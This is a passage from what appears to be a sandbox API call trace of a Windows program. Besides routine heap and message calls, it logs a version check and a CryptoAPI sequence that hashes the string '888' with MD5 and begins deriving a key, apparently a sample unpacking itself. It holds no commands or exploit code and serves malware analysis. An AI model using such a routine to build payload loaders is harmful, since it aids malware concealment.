dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.915] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.916] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.916] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.917] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.917] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.917] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0209.917] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.917] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.917] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0209.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.918] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.918] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.918] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.918] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.918] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.918] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7200, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7120, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.918] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c660) returned 1 [0209.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.919] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0209.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.919] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0209.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.919] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.919] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.919] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.920] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.920] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0209.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.920] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0209.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.920] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.920] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.920] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.920] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.921] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.921] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.921] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.921] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.921] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.921] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.921] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.921] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.921] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.921] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.921] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.921] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.921] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.921] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.921] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.921] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.922] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab260, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0209.922] CryptCreateHash (in: hProv=0xa7c660, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0209.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ba8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.922] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.922] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.922] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.923] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0209.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0209.923] CryptHashData (hHash=0x9e1bf8, pbData=0x2a71cf8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.923] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.923] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.923] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.923] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.923] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.923] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.923] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.923] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.923] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.923] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.923] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, 